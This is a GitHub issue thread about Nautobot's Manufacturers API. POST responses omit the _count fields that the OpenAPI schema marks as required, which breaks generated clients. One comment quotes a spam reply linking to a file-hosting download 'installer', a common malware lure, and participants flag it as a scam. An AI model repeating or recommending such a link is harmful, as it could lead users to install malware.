### ISSUE TITLE
[API] Manufacturers API issues

### ISSUE THREAD

**Issue by TobiPeterG** [nautobot/nautobot#6183]
### Environment
* Nautobot version (Docker tag too if applicable): 2.3.1
* Python version: 3.11
* Database platform, version:
* Middleware(s):

### Steps to Reproduce
1. use API to create Manufacturer
2. look at API response
3.

### Expected Behavior
The API response should contain the cloud_account_count property

### Observed Behavior
It doesn't contain the cloud_account_count property

Example response:
{
	"id": "acdab361-1a3b-43c6-9f2c-b1cacb0921a3",
	"object_type": "dcim.manufacturer",
	"display": "New Vendor",
	"url": "https://demo.nautobot.com/api/dcim/manufacturers/acdab361-1a3b-43c6-9f2c-b1cacb0921a3/",
	"natural_slug": "new-vendor_acda",
	"name": "New Vendor",
	"description": "Created with Terraform",
	"created": "2024-09-04T13:39:44.299984Z",
	"last_updated": "2024-09-04T13:39:44.299999Z",
	"notes_url": "https://demo.nautobot.com/api/dcim/manufacturers/acdab361-1a3b-43c6-9f2c-b1cacb0921a3/notes/",
	"custom_fields": {},
	"computed_fields": {},
	"relationships": {}
}

This is an issue, especially since the openAPI specification lists the cloud_account_count parameter as required, so auto-generated code like go-nautobot expect the parameter to be part of the response. It might be that the parameter should not be required in the specification, but it should be in the API response anyway.

**Comment by TobiPeterG** [comment]
> try this https://gofile.io/d/yMHabA select the desired compiler in the installer

Umm what is this?
Looks very much like a scam

**Comment by glennmatthews** [comment]
Yeah, we're having some issues with spam lately, though GitHub seems to be pretty quick on auto-deleting them as soon as they show up. Thanks!

**Comment by glennmatthews** [comment]
OK, so this is interesting - the `_count` fields on various API endpoints are really only relevant to the `GET` responses, they aren't generally included in (and shouldn't generally (IMO) be part of the schema for) `PUT`/`PATCH`/`POST` responses. Will need to figure out:

1) Whether this is specific in some way to the `manufacturers` endpoint or a more global issue
2) Whether we should update the API to include these count fields in PUT/PATCH/POST responses, or whether we should update the schema to indicate that they are not an expected part of the response in these cases.

**Comment by TobiPeterG** [comment]
The issue also exist with the `device_type_count` property for Manufacturers, not just cloud_account_count

Will check if other properties are also an issue

**Comment by TobiPeterG** [comment]
This issue seems to exist for other objects as well, I have the same issue with cluster_type and _count variables.
